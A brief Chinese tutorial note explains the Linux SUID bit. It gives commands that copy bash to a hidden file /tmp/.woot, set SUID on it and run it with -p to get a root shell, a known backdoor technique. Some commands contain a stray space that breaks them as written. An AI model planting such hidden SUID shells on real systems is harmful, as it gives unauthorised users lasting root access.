在介绍linux提权的时候,曾说过SUID。
什么是suid ❓
suid全称是Set owner User ID up on execution。
这是Linux给可执行文件的一个属性,s标志。通俗的理解为其他用户执行这个程序的时候可以用该程序所有者/组的权限。
需要注意的是,只有程序的所有者是0号或其他super user,同时拥有suid权限,才可以提权。
创建一个suid权限的文件:
cp /bin/bash / tmp/.woot
chmod u+s / tmp/.woot
ls -al /tmp/.woot
使用普通用户运行就可获得root权限:
/tmp/.woot
/tmp/.woot -p #bash2 针对suid有一些护卫的措施,需要使用-p参数来获取一个root shell
